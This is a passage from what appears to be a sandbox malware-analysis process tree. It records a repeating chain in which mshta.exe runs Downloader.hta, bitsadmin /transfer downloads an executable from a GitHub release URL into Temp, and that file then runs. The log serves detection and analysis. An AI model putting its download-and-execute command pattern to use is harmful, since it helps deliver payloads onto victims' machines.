        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        144⤵
        
        PID:1740
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        145⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        145⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        146⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        146⤵
        Modifies Internet Explorer settings
        
        PID:2612
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        147⤵
        Download via BitsAdmin
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        147⤵
        
        PID:836
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        148⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        148⤵
        Modifies Internet Explorer settings
        
        PID:1692
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        149⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        149⤵
        
        PID:940
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        150⤵
        
        PID:692
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        150⤵
        Modifies Internet Explorer settings
        
        PID:2224
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        151⤵
        Download via BitsAdmin
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        151⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        152⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        152⤵
        Modifies Internet Explorer settings
        
        PID:2812
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        153⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        153⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        154⤵
        
        PID:2900
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        154⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        155⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        155⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        156⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        156⤵
        Modifies Internet Explorer settings
        
        PID:980
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        157⤵
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        157⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        158⤵
        
        PID:1096
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        158⤵
        Modifies Internet Explorer settings
        
        PID:1816
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        159⤵
        Download via BitsAdmin
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        159⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        160⤵
        
        PID:892
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        160⤵
        Modifies Internet Explorer settings
        
        PID:2040
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        161⤵
        Download via BitsAdmin
        
        PID:1692
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        161⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        162⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        162⤵
        Modifies Internet Explorer settings
        
        PID:2308
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        163⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        163⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        164⤵
        
        PID:2736
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        164⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        165⤵
        Download via BitsAdmin
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        165⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        166⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        166⤵
        
        PID:6888
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        167⤵
        
        PID:6600
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        167⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        168⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        168⤵
        
        PID:2708
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        169⤵
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        169⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        170⤵
        
        PID:3900
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        170⤵
        
        PID:4120
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        171⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        171⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        172⤵
        
        PID:3924
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        172⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        173⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        173⤵
        
        PID:5308
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        174⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        174⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        175⤵
        
        PID:5984
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        175⤵
        
        PID:1712
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        176⤵
        
        PID:800
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        176⤵
        
        PID:6104
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        177⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        177⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        178⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        178⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        179⤵
        Download via BitsAdmin
        
        PID:6064
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        179⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        180⤵
        
        PID:6056
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        180⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        181⤵
        Download via BitsAdmin
        
        PID:6616
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        181⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        182⤵
        
        PID:940
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        182⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        183⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        183⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        184⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        184⤵
        
        PID:4732
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        185⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        185⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        186⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        186⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        187⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        187⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        188⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        188⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        189⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        189⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        190⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        190⤵
        
        PID:6608
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        191⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        191⤵
        
        PID:5492
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        192⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        192⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        193⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        193⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        194⤵
        
        PID:6944
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        194⤵
        
        PID:5084
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        195⤵
        Download via BitsAdmin
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        195⤵
        
        PID:5044
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        196⤵
        
        PID:7064
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        196⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        197⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        197⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        198⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        198⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        199⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        199⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        200⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        200⤵
        
        PID:6228
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        201⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        201⤵
        
        PID:5724
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        202⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        202⤵
        
        PID:6156
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        203⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        203⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        204⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        204⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        205⤵
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        205⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        206⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        206⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        207⤵
        Download via BitsAdmin
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        207⤵
        
        PID:3548
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        208⤵
        
        PID:1240
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        208⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        209⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        209⤵
        
        PID:1560
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        210⤵
        
        PID:6336
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        210⤵
        
        PID:4292
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        211⤵
        Download via BitsAdmin
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        211⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        212⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        212⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        213⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        213⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        214⤵
        
        PID:6448
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        214⤵
        
        PID:4308
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        215⤵
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        215⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        216⤵
        
        PID:6468
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        216⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
